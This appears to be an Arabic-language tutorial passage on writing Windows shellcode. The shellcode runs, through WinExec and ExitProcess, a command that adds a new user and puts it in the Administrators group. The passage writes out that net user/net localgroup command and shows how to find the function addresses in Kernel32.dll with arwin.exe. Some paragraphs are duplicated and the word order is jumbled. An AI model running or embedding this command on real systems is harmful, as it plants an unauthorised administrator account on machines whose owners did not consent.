الان سنقوم بكتابة شلكود يعمل علي اصدار الوندوز الدي تعمل عليه يعني لو نسخت الشلكود وحاولت ان تقوم بتشغيله علي اصدار اخر لن يعمل لك
الشلكود الدي سنكتبه يقوم باضافة حساب جديد يعني مستخدم جديد للنظام
الشلكود الدي سنكتبه يقوم باضافة حساب جديد يعني مستخدم جديد للنظام
نبدأ بسم الله
نعلم انه لاضافة مستخدم جديد في الوندوز نقوم بتطبيق الامر التالي في الدوس
cmd
net user sad723 sad723 /add && net localgroup Administrators /add sad723
لقد قمنا باضافة مستخدم جديد له نفس صلاحية المدير
الاسم sad723
الباس sad723
الصلاحية Administrators
النص و هي قامت باضافة المستخدم الجديد WinExec في حقيقة الامر قمنا باعطاء الدالة
ويعطيها النص كمتغيرل WinExec نحن سنقوم بكتابة كود بلغة الاسمبلي يقوم باستدعاء الدالة
ادن الدوال التي سنسخدمها هي
زائد الدالةWinExec
ExitProcess
من اجل الخروج
الان يجب علينا معرفة مكان تواجد هاتين الدالتين في الدلل الخاصة بالوندوز. من اجل معرفة دلك هناك طريقتبن
الاولي هي استخدام السكربت المرفق نعطيه اسم الدالة وهو يعطينا الدلل الدي توجد فيه
الثانية:هي الدهاب الي موقع مكرسفت ووضع اسم الدالة المرادة وانا افضل هده الطريقة
مادا بعد معرفة الدلل الدي توجد فيه الدالة ؟
arwin.exe الان نبحث عن عنوان الدالة داخل الدلل و نستعمل من اجل دلك
النتيجة ستكون مختلفة حسب الاصدار الدي تستخدمه مثلا انا تحصلت علي النتائج التالية
ادن الدوال التي سنسخدمها هي
زائد الدالةWinExec
ExitProcess
من اجل الخروج
الان يجب علينا معرفة مكان تواجد هاتين الدالتين في الدلل الخاصة بالوندوز. من اجل معرفة دلك هناك طريقتبن
الاولي هي استخدام السكربت المرفق نعطيه اسم الدالة وهو يعطينا الدلل الدي توجد فيه
./findFunctionInDLL.sh WinExec
./findFunctionInDLL.sh ExitProcess
Kernel32.dllالنتيجة ستكون الثانية:هي الدهاب الي موقع مكرسفت ووضع اسم الدالة المرادة وانا افضل هده الطريقة
http://social.msdn.microsoft.com/Search/en-us?query=WinExec
http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx
مادا بعد معرفة الدلل الدي توجد فيه الدالة ؟
arwin.exe الان نبحث عن عنوان الدالة داخل الدلل و نستعمل من اجل دلك
./arwin.exe Kernel32.dll WinExec
النتيجة ستكون مختلفة حسب الاصدار الدي تستخدمه مثلا انا تحصلت علي النتائج التالية
WinExec is located at 0x76d0e695 in Kernel32.dll
ExitProcess is located at 0x76cd2acf in Kernel32.dll
قم بحفظ النتيجة سنستخدمها بعد حين